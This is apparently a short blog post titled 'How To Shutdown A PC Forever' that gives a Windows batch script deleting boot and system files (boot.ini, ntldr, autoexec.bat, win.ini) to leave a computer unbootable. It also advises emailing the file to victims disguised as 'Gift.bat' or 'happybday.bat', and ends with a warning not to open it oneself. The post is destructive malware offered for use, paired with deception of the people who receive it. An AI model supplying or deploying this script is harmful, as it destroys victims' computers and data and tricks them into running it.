How To Shutdown A PC Forever

How To Shutdown A PC Forever


1)Open notepad and type this code:

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

2)Save it as name.bat , for example: hackzhell.bat , the .bat is important to put or the program will not work. And on the computer you want to shutdown, open it. Or if you want to e-mail it to someone you can change the name something like Gift.bat , happybday.bat.

REMEMBER – DO NOT CLICK THIS FILE. YOU WON’T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!

No comments:

Post a Comment